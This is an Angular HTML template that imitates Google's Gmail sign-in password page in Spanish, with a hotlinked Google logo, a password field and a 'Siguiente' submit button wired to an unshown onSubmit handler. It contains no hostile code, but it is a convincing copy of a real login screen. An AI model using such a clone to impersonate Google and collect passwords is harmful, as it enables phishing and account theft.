<form [formGroup]="formPassword" class="container" (ngSubmit)="onSubmit()">
    <div class="top-content">
        <img src="https://i.postimg.cc/CL7CmGSx/google-logo-png-29530.png" alt="">
        <h2>Inicia sesión</h2>
        <p class="heading">Ir a Gmail</p>

    </div>
    <div class="inputs">
        <!--input type="email" name="" id="email" class="input"-->
        <!--label for="email" class="input-label">Email or phone</label-->
        <mat-form-field [hideRequiredMarker]="true" appearance="outline" class="full-width">
            <mat-label>Ingresa tu contraseña</mat-label>
            <input matInput [type]="showPassword ? 'text' : 'password'" formControlName="password">
            <mat-error *ngIf="handleError('password', 'required')">
                Ingresa una contraseña
            </mat-error>
        </mat-form-field>
        <section class="show-password-section">
            <mat-checkbox (change)="togglePasswordVisibility()" class="check-margin">Mostrar contraseña</mat-checkbox>
        </section>
    </div>

    <div class="btn-group">
        <button class="create-btn">¿Olvidaste tu contraseña?</button>
        <button class="next-btn" type="submit">Siguiente</button>

    </div>

</form>